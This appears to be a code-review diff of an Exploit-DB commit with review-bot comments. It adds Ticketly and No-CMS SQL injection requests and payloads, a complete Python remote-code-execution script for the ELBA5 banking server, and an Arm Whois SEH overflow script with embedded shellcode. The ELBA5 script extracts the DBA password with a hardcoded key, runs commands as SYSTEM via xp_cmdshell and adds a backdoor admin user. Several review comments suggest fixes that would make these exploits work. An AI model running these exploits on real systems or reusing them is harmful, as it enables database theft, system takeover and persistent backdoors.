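Review bot: the request dump carries live session material from the tester's install: the `wordpress_logged_in_...` and `wordpress_...` auth cookies, `PHPSESSID`, and several nonces (`_wpnonce`, `meta-box-order-nonce`, `samplepermalinknonce`, ...); none of them is needed to understand the issue and they should be replaced with placeholders. The description should also state the privilege required (the request is an `editpost` action by `post_author=1`, i.e. a logged-in user allowed to create testimonial posts) and where the stored `_ikcf_client`, `_ikcf_position` and `_ikcf_other` values are later rendered without escaping, since that determines who is exposed. Minor: the title should read "WordPress plugin Easy Testimonials 3.2", and the three parameters on the "Three parameters" line need separators.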


@ -0,0 +1,79 @@
# Exploit Title: Ticketly 1.0 Multiple SQL Injection
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-11-19
# Google Dork: N/A
# Vendor: Abisoft (https://abisoftgt.net)
# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
# Affected Version: 1.0
# Patched Version: unpatched
# Category: Web Application
# Platform: Windows & Ubuntu
# Tested on: Win10x64 & Kali Linux
# CVE: 2018-18923
# 1. Technical Description:
# Ticketly 1.0 are affected by SQL Injection in multiple parameters and
# resources through POST. This allows a attacker to read and modify
# sensitive information from the database used by the application.
# 2. Proof Of Concept (PoC):
# 2.1 The following POST request generates an error 500 in the Application (add ' in name parameter)
---
POST /ticketly/action/addproject.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/ticketly/projects.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
name=Test%22&description=Test
---
# 2.2 In another request, add two ' to receive a code 200 OK
---
POST /ticketly/action/addproject.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/ticketly/projects.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
name=Test%22%22&description=Test
---
# 3. Payloads
# 3.1 Payload (boolean-based blind)
name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test
# 3.2 Payload (error-based)
name=Test” AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test
#3.3 Payload (AND/OR time-based blind)
name=Test” RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test
# 4. Vulnerables resources and parameters
# /action/addproject.php (description, name, category_id and description)
# /action/addticket.php (king_id, priority_id, project_id, status_id and title)
# /reports.php (kind_id y status_id)
# 5. Timeline
# 24/07/2018 Discovery
# 24/07/2018 Contact with developer
# 24/07/2018 Solution to vulnerability as pending
# 02/11/2018 Request ID CVE
# 04/11/2018 Assigned CVE-2018-18923
# 05/11/2018 Public disclosure
# 6. References:
# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/
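Review bot: section 2.1 says to "add ' in name parameter", but both requests URL-encode a double quote (`%22`) and every payload in section 3 closes with `"`; make the text match the requests. The first request's `Content-Length: 32` does not match its 29-byte body `name=Test%22&description=Test` (the second body is 32 bytes, so that one is right). In sections 3.2 and 3.3 the quote after `Test` is a typographic `”` rather than `"`, which would not reproduce the result. In section 4, `king_id` should be `kind_id` (as in the title), `description` is listed twice for addproject.php, and the Spanish "y" in "(kind_id y status_id)" should be "and".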


@ -0,0 +1,42 @@
# Exploit Title: No-Cms 1.0 - 'order_by' SQL Injection
# Date: 2018-11-28
# Exploit Author: Loading Kura Kura
# Vendor Homepage: https://github.com/goFrendiAsgard/No-CMS
# Software Link: https://codeload.github.com/goFrendiAsgard/No-CMS/zip/master
# Tested on: Win10/Kali Linux
# Google Dork: n/a
# Version: n/a
# CVE :
# No-CMS is a CMS-framework.
# No-CMS is a basic and "less-assumption" CMS with some default features such as
# user authorization (including third party authentication), menu, module and theme management.
# It is fully customizable and extensible, you can make your own module and your own themes.
# It provide freedom to make your very own CMS, which is not provided very well by any other CMS.
# POC
#Sqli injection { order_by[0] }
POST /nocms/main/manage_privilege/index/export HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/nocms/main/manage_privilege
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Connection: close
Cookie: bb9865483ae270ceba27539501d10599=rf0at4ehbd1ttckd85skvf17ssq4dfh2; crud_page_a36781f1e31bde68770f40381aad7df6=1; per_page_a36781f1e31bde68770f40381aad7df6=25; hidden_ordering_a36781f1e31bde68770f40381aad7df6=asc; hidden_sorting_a36781f1e31bde68770f40381aad7df6=index; search_text_a36781f1e31bde68770f40381aad7df6=; search_field_a36781f1e31bde68770f40381aad7df6=; 3c158ec1144ba8bb0dd8a7ca03988b5c=e4p2j92lle03vpp6ccuv2c8dro86ebep; crud_page_710a7d8c82ae37e845c3da5df1073379=1; per_page_710a7d8c82ae37e845c3da5df1073379=25; hidden_ordering_710a7d8c82ae37e845c3da5df1073379=desc; hidden_sorting_710a7d8c82ae37e845c3da5df1073379=date; search_text_710a7d8c82ae37e845c3da5df1073379=dd; search_field_710a7d8c82ae37e845c3da5df1073379=sec0e67fc; __secret_code=d282ef263719ab842e05
Upgrade-Insecure-Requests: 1
search_text=&search_field=/**/&per_page=25&order_by[0]=[INJECT HERE]&order_by[1]=&page=1
=========================
Regards
Loading Kura Kura
thanks To :
Siluman IWAK
Siluman Cupatkai
Siluman TUMO
dan kamu sayang :*
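Review bot: the header leaves `# Version: n/a` and an empty `# CVE :` while the title claims 1.0; state the tested release or commit of No-CMS, since the software link points at `master`, which moves. The request targets `/main/manage_privilege/index/export` with a `Referer` on the privilege management page, so the advisory should say that the injection requires an authenticated administrative session. The `Cookie:` line contains the tester's session identifiers and `__secret_code`, which should be redacted. The "Regards" / "thanks To" block after the request is not part of the advisory format and belongs in the submitter's notes rather than in the exploit file.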

exploits/windows/remote/45905.py (216 lines, executable file)

@ -0,0 +1,216 @@
# Exploit Title: ELBA5 5.8.0 - Remote Code Execution
# Date: 2018-11-16
# Exploit Author: Florian Bogner
# Vendor Homepage: https://www.elba.at
# Vulnerable Software: https://www.elba.at/eBusiness/01_template1/1206507788612244132-1206515595789049657_1206515641959948315-1292519691128454196-NA-38-NA.html
# Version: up to 5.8.0
# Tested on: any Windows OS
# Full Writeup: https://bogner.sh/2018/11/0-day-in-elba5s-network-installation-overtaking-your-companys-bank-account/
# Summary: This exploit has been tested against ELBA5 version 5.7.1 to 5.8.0. It can be used to remotely obtain code
# execution on the ELBA5 server with full SYSTEM level permissions. Additionally, a backdoor user can be added
Please see attachment for the full python exploit.
import sys
import hashlib
try:
import sqlanydb
except:
print("\n")
print("==================================================")
print("This exploit depends on the sqlanydb python module")
print("Run \"pip install sqlanydb\" to install it")
print("==================================================")
print("\n")
raise
# this should be defined on the cli
DB_HOST=None
ACTION=None
# The default ELBA port
DB_PORT="2640"
# The servername to connect to... does not really matter anywhay
DB_SERVERNAME="ELBA5SRV"
# The initial "connector" database user that is used to obtain the actual DBA credentials
DB_CONNECTOR_UID="connector"
DB_CONNECTOR_PWD="connector"
# The actual DB user with DBA permissions
DB_DBA_UID="elba"
DB_DBA_PWD=None
DB_DBA_ENCRYPTION_PWD="Af&Pw_dw7$Yd9#"
def main():
print("==================================================")
print(" ELBA5 Electronic Banking (https://www.elba.at/)")
print(" Network Installation RCE Exploit")
print("")
print("This exploit has been tested against version 5.7.1")
print("to 5.8.0. It can be used to remotely obtain code")
print("execution on the ELBA5 server with full SYSTEM")
print("level permissions.")
print("")
print("Discovered by: Florian Bogner @ Bee IT Security")
print(" florian(at)bee-itsecurity.at")
print("==================================================")
print("")
if (len(sys.argv)<3):
print_usage()
sys.exit(1)
# get info from cli
global DB_HOST
global ACTION
DB_HOST=sys.argv[1]
ACTION=sys.argv[2]
#### phase 1
print("[*] Starting phase 1: Obtain & Decrypt DBA password")
DB_DBA_PWD=fetch_db_dba_pwd()
if (DB_DBA_PWD==None):
print("[-] Something went wrong in phase 1... Exiting")
sys.exit(1)
print("[+] Received the DBA password: "+DB_DBA_PWD)
#### phase 2
print("[*] Starting phase 2: Establishing a DB connection as DBA")
conn = sqlanydb.connect(
uid=DB_DBA_UID,
pwd=DB_DBA_PWD,
servername='ELBA5SRV',
host=''+DB_HOST+':'+DB_PORT
)
if (conn==None):
print("[-] Something went wrong in phase 2... Exiting")
sys.exit(1)
print("[+] Connection established as DBA")
#### deliver payload
if (ACTION=="addUser"):
print("[*] Starting phase 3: Adding a backdoor user")
add_elba_user(conn);
elif (ACTION=="runCommand"):
print("[*] Starting phase 3: Running command")
run_command(conn);
else:
print("[*] Unknown action "+ACTION+"... Exiting cleanly")
#### winding down
print("[*] Closing DBA connection")
conn.close()
def print_usage():
print("Usage: "+sys.argv[0]+" <target> <action> <sub arguments...>");
print("");
print("target: The system to attack");
print("actions:");
print(" * addUser: adds an ELBA Backdoor user to the given install")
print(" * runCommand: A command to run on the target as SYSTEM")
print(" Provide the command to run as a sub argument")
print(" (No output is provided)")
def run_command(conn):
if (len(sys.argv)!=4):
print("[-] No command given... Exiting cleanly")
return
CMD=sys.argv[3]
curs = conn.cursor()
print("[*] Will try to execute: "+CMD)
curs.execute("CALL xp_cmdshell('"+CMD+"');")
curs.close()
def add_elba_user(conn):
USER_TO_ADD = "HACKER"
USER_PASSWORD = "H4cker"
# check if a user with the given name already exists
print("[*] Checking if the username "+USER_TO_ADD+" is unused")
curs = conn.cursor()
curs.execute("SELECT * FROM \"elbndba\".\"BEDIENER\" WHERE BEDIENER='"+USER_TO_ADD+"'")
rowset = curs.fetchall()
curs.close()
if (len(rowset)>0):
print("[-] A user with the name "+USER_TO_ADD+" already exists! Exiting cleanly...")
return
# get the largest current bedienerKey
print("[*] Request the largest current bedienerKey")
curs = conn.cursor()
curs.execute("SELECT MAX(bedienerKey) FROM \"elbndba\".\"BEDIENER\"")
currentBedienerKey = curs.fetchone()[0]
curs.close()
newBedienerKey=currentBedienerKey+1
print("[*] Will use the new bedienerKey "+str(newBedienerKey))
# create password hash
print("[*] Hash the password")
usrdir="USER"+str(newBedienerKey)
string_to_hash=USER_PASSWORD+str(newBedienerKey)+usrdir
hash = hashlib.sha256(string_to_hash.encode('ascii','replace')).hexdigest()
print("[*] Will use the hash: "+hash)
# add the user
print("[*] Finally adding the user")
curs = conn.cursor()
sql = "INSERT INTO \"elbndba\".\"BEDIENER\" (BEDIENER,NAME,ABTEILUNG,PASSWORT,GESPERRT,ADMIN,USRDIR,geloescht,bedienerKey) "
sql += "VALUES ('"+USER_TO_ADD+"','"+USER_TO_ADD+"','','"+hash+"',0,1,'"+usrdir+"',0,"+str(newBedienerKey)+");"
curs.execute(sql)
# commit changes
print("[*] Commiting changes")
conn.commit()
print("[+] Login as "+USER_TO_ADD+" with the password "+USER_PASSWORD)
curs.close()
# connect to the target host with the "connector" user and extract the dba password
def fetch_db_dba_pwd():
target_host=''+DB_HOST+':'+DB_PORT
print("[*] Trying to connect to the target server: "+target_host)
conn = sqlanydb.connect(
uid=DB_CONNECTOR_UID,
pwd=DB_CONNECTOR_PWD,
servername='ELBA5SRV',
host=target_host
)
print("[*] Extracting the secret key")
curs = conn.cursor()
curs.execute("SELECT DECRYPT(daten, '"+DB_DBA_ENCRYPTION_PWD+"', 'AES') FROM elbndba.connection")
# decode the result to a valid utf-8 string
decrypted_pwd=curs.fetchone()[0].decode("utf-8") ;
curs.close()
conn.close()
return decrypted_pwd;
main();
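Review bot: the line `Please see attachment for the full python exploit.` sits between the `#` header and `import sys` without a comment marker, so Python rejects the whole file with a SyntaxError before anything runs; it needs a leading `#` or should be dropped. Further down, the `if (conn==None)` check after `sqlanydb.connect(...)` in `main()` is dead code, and `fetch_db_dba_pwd()` has no error handling at all: the driver raises on a failed connection rather than returning None, so an unreachable host or a changed `connector` password produces a traceback instead of the `[-] Something went wrong in phase 1` message. The bare `except:` around `import sqlanydb` also swallows KeyboardInterrupt; `except ImportError:` is the intended scope. Since every step rides on the `connector`/`connector` login to the SQL Anywhere listener on `2640`, followed by `DECRYPT(...)` on `elbndba.connection` and `CALL xp_cmdshell(...)`, the `# Summary:` header would be more useful to readers if it named those as the things to lock down and monitor.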
@ -0,0 +1,42 @@
# Exploit Title: Arm Whois 3.11 - Buffer Overflow (ASLR)
# Google Dork: [if applicable]
# Date: 23/11/2018
# Exploit Author: zephyr
# Vendor Homepage: http://www.armcode.com
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows Vista Ultimate SP1 x86 unpatched
# CVE :
# nSEH @ 672 on Windows Vista Ultimate SP1 unpatched
# msfvenom -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -a x86 --platform windows
nops = "\x90"*20
buf = "w00tw00t" + nops + ("\xba\x0e\xc3\xc8\xe6\xdd\xc4\xd9\x74\x24\xf4\x5e\x29"
"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x01\x21"
"\x3d\x1a\xf5\x27\xbe\xe3\x05\x48\x36\x06\x34\x48\x2c"
"\x42\x66\x78\x26\x06\x8a\xf3\x6a\xb3\x19\x71\xa3\xb4"
"\xaa\x3c\x95\xfb\x2b\x6c\xe5\x9a\xaf\x6f\x3a\x7d\x8e"
"\xbf\x4f\x7c\xd7\xa2\xa2\x2c\x80\xa9\x11\xc1\xa5\xe4"
"\xa9\x6a\xf5\xe9\xa9\x8f\x4d\x0b\x9b\x01\xc6\x52\x3b"
"\xa3\x0b\xef\x72\xbb\x48\xca\xcd\x30\xba\xa0\xcf\x90"
"\xf3\x49\x63\xdd\x3c\xb8\x7d\x19\xfa\x23\x08\x53\xf9"
"\xde\x0b\xa0\x80\x04\x99\x33\x22\xce\x39\x98\xd3\x03"
"\xdf\x6b\xdf\xe8\xab\x34\xc3\xef\x78\x4f\xff\x64\x7f"
"\x80\x76\x3e\xa4\x04\xd3\xe4\xc5\x1d\xb9\x4b\xf9\x7e"
"\x62\x33\x5f\xf4\x8e\x20\xd2\x57\xc4\xb7\x60\xe2\xaa"
"\xb8\x7a\xed\x9a\xd0\x4b\x66\x75\xa6\x53\xad\x32\x02"
"\x6e\xac\x19\x3b\xd7\xa4\x1c\x26\xe8\x12\x62\x5f\x6b"
"\x97\x1a\xa4\x73\xd2\x1f\xe0\x33\x0e\x6d\x79\xd6\x30"
"\xc2\x7a\xf3\x52\x85\xe8\x9f\xba\x20\x89\x3a\xc3")
egghunter = nops + ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") + "\x90"*15
junk = "A"*(672-len(buf+egghunter))
nseh = "\xeb\xc7\x90\x90"
seh = "\x57\x22\x41"
payload = junk + buf + egghunter + nseh + seh
f = open("tmp.txt", 'wb')
f.write(payload)
f.close()
print len(payload)
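Review bot: the header keeps the template placeholders (`# Google Dork: [if applicable]`, an empty `# CVE :`) and does not say which Arm Whois input consumes `tmp.txt`, so the crash cannot be reproduced or triaged from the file alone; fill or remove the placeholders and document the reproduction step. The script is also Python 2 only (`print len(payload)` is a print statement, and `f.write(payload)` writes a `str` to a file opened with `'wb'`), which the `# Tested on:` line should state, since under Python 3 it fails before the file is written.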
@ -6195,6 +6195,7 @@ id,file,description,date,author,type,platform,port
45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows,
45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows,
45891,exploits/macos/dos/45891.c,"Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
45901,exploits/linux/dos/45901.txt,"MariaDB Client 10.1.26 - Denial of Service (PoC)",2018-11-26,strider,dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10116,6 +10117,8 @@ id,file,description,date,author,type,platform,port
45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86,
45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,barracud4_,local,multiple,
45893,exploits/windows/local/45893.txt,"Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation",2018-11-20,"Google Security Research",local,windows,
45907,exploits/windows_x86/local/45907.txt,"Arm Whois 3.11 - Buffer Overflow (ASLR)",2018-11-26,zephyr,local,windows_x86,
45908,exploits/multiple/local/45908.rb,"Xorg X11 Server - SUID privilege escalation (Metasploit)",2018-11-26,Metasploit,local,multiple,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
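Review bot: the new entry `45907,exploits/windows_x86/local/45907.txt,...` records the Arm Whois exploit as a `.txt` file although its content in this commit is a Python script (`nops = ...`, `f = open("tmp.txt", 'wb')`), unlike `45905.py` added in the same commit; either store it with a `.py` extension or make the naming convention consistent so tooling that keys on the extension treats both the same way.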
@ -16965,6 +16968,8 @@ id,file,description,date,author,type,platform,port
45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php,
45791,exploits/bsd/remote/45791.rb,"Morris Worm - fingerd Stack Buffer Overflow (Metasploit)",2018-11-06,Metasploit,remote,bsd,79
45851,exploits/java/remote/45851.rb,"Atlassian Jira - Authenticated Upload Code Execution (Metasploit)",2018-11-14,Metasploit,remote,java,2990
45905,exploits/windows/remote/45905.py,"ELBA5 5.8.0 - Remote Code Execution",2018-11-26,"Florian Bogner",remote,windows,2640
45909,exploits/hardware/remote/45909.rb,"Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)",2018-11-27,Metasploit,remote,hardware,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
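Review bot: the `45905,exploits/windows/remote/45905.py,...` entry carries the date `2018-11-26` while the file's own header says `# Date: 2018-11-16`; if the CSV column is the publication date rather than the author's date, that convention should be documented, otherwise one of the two values needs correcting. The port column `2640` agrees with `DB_PORT` in the script, so that part is consistent.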
@ -40400,3 +40405,8 @@ id,file,description,date,author,type,platform,port
45895,exploits/php/webapps/45895.txt,"Ticketly 1.0 - 'name' SQL Injection",2018-11-21,"Javier Olmedo",webapps,php,80
45896,exploits/php/webapps/45896.txt,"WordPress CherryFramework Themes 3.1.4 - Backup File Download",2018-11-21,b1p0l4r,webapps,php,80
45897,exploits/php/webapps/45897.txt,"WebOfisi E-Ticaret V4 - 'urun' SQL Injection",2018-11-21,AkkuS,webapps,php,80
45899,exploits/hardware/webapps/45899.txt,"Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials",2018-11-26,Hodorsec,webapps,hardware,
45900,exploits/php/webapps/45900.txt,"WordPress Plugins Easy Testimonials 3.2 - Cross-Site Scripting",2018-11-26,En_dust,webapps,php,80
45902,exploits/php/webapps/45902.txt,"Ticketly 1.0 - 'kind_id' SQL Injection",2018-11-26,"Javier Olmedo",webapps,php,80
45903,exploits/php/webapps/45903.txt,"No-Cms 1.0 - 'order_by' SQL Injection",2018-11-26,"Loading Kura Kura",webapps,php,80
45904,exploits/hardware/webapps/45904.txt,"Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal",2018-11-26,"numan türle",webapps,hardware,80